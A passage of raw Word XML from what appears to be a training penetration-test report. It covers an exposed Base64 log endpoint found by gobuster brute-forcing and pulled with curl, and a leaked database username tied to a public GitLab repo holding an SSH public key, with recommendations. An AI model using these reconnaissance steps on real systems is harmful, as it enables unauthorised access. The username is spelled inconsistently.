          <w:tcPr>
            <w:tcW w:w="10425" w:type="dxa"/>
            <w:tcBorders/>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:suppressAutoHyphens w:val="true"/>
              <w:spacing w:lineRule="auto" w:line="240" w:before="80" w:after="120"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Normaltextrun"/>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Screenshots:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10425" w:type="dxa"/>
            <w:tcBorders/>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:suppressAutoHyphens w:val="true"/>
              <w:spacing w:lineRule="auto" w:line="240" w:before="80" w:after="120"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:drawing>
                <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="96">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>0</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>176530</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="6482715" cy="4364990"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapSquare wrapText="largest"/>
                  <wp:docPr id="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 descr=""/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId8"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="6482715" cy="4364990"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:anchor>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:suppressAutoHyphens w:val="true"/>
              <w:bidi w:val="0"/>
              <w:spacing w:lineRule="auto" w:line="240" w:before="80" w:after="120"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:suppressAutoHyphens w:val="true"/>
              <w:bidi w:val="0"/>
              <w:spacing w:lineRule="auto" w:line="240" w:before="80" w:after="120"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:suppressAutoHyphens w:val="true"/>
              <w:bidi w:val="0"/>
              <w:spacing w:lineRule="auto" w:line="240" w:before="80" w:after="120"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:suppressAutoHyphens w:val="true"/>
              <w:bidi w:val="0"/>
              <w:spacing w:lineRule="auto" w:line="240" w:before="80" w:after="120"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:suppressAutoHyphens w:val="true"/>
              <w:spacing w:lineRule="auto" w:line="240" w:before="80" w:after="120"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:suppressAutoHyphens w:val="true"/>
              <w:spacing w:lineRule="auto" w:line="240" w:before="80" w:after="120"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:suppressAutoHyphens w:val="true"/>
              <w:spacing w:lineRule="auto" w:line="240" w:before="80" w:after="120"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:suppressAutoHyphens w:val="true"/>
              <w:spacing w:lineRule="auto" w:line="240" w:before="80" w:after="120"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:suppressAutoHyphens w:val="true"/>
              <w:spacing w:lineRule="auto" w:line="240" w:before="80" w:after="120"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:suppressAutoHyphens w:val="true"/>
              <w:spacing w:lineRule="auto" w:line="240" w:before="80" w:after="120"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="80" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability 6 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="80" w:after="120"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> Information Disclosure via Base64-encoded Log File → RISK: High</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The application exposes a sensitive log file at the following location:</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>http://185.218.124.165/z</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Upon visiting the endpoint, the response contains a large Base64-encoded blob. After decoding the content using standard tools (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>base64 -d</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>), it was confirmed that this file contains detailed internal logs including:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Database hostname: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>localhost</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Database port: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>5432</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> (PostgreSQL default)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Database username: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>softunibloadmin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Web application login and GitLab login confirmed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>System diagnostics including CPU, RAM, Disk, Temperature</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Backup and software update logs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="HorizontalLine"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>How did I find it:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>/z</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> endpoint was discovered during </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>avtive</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> reconnaissance, using directory brute-forcing with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>gobuster</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> and manual browsing. The raw output from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>/z</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> appeared to be Base64, which was saved and decoded using:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="80" w:after="120"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="98">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>341630</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-8255</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5516245" cy="240601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9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5516245" cy="2406015"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>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drawing>
          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="99">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>635</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6624320" cy="142240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0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6624320" cy="1422400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="80" w:after="120"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>curl -s http://185.218.124.165/z -o encoded.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="80" w:after="120"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>cat encoded.txt | base64 -d</w:t>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4963160" cy="512508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1"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4963160" cy="5125085"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>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bidi w:val="0"/>
        <w:spacing w:before="80" w:after="120"/>
        <w:rPr>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Heading3"/>
        <w:spacing w:before="80" w:after="120"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability 7: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Information Disclosure via GitLab Repo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> → Risk: Medium to High</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:br/>
        <w:t xml:space="preserve">Using internal credentials found in leaked </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>/z</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> logs (PostgreSQL username </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>softuniblogadmin</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>), we correlated this identity with a public GitLab profile at:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Quotations"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>https://gitlab.com/softuniblogadmin/mybackup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">This repository contains a publicly accessible </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>id_rsa.pub</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> file, which may have been part of a previously compromised SSH key pair. The repository README confirms that the private key was once deployed to the server, indicating that at one point, an attacker could have had remote SSH access.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>How I found it:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Discovered PostgreSQL username from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>/z</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Queried GitLab via browser: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>gitlab.com/softuniblogadmin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Found </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>mybackup</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> repo with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>id_rsa.pub</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> and message confirming compromise</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Risk:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">While the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>private key is missing</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, this confirms historical compromise.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This introduces reputational risk, evidence of prior unauthorized access, and possibly residual backdoors.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Recommendation:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Audit server for persistence mechanisms</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Rebuild all credentials and revoke all previous SSH keys</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Avoid committing keys (even public) to public VCS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="80" w:after="120"/>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="101">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>635</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6624320" cy="3512185"/>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2"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6624320" cy="3512185"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>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Heading3"/>
        <w:spacing w:before="80" w:after="120"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability 8: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Public Exposure of SSH Key in Git Repository</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> → Risk: High</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r>
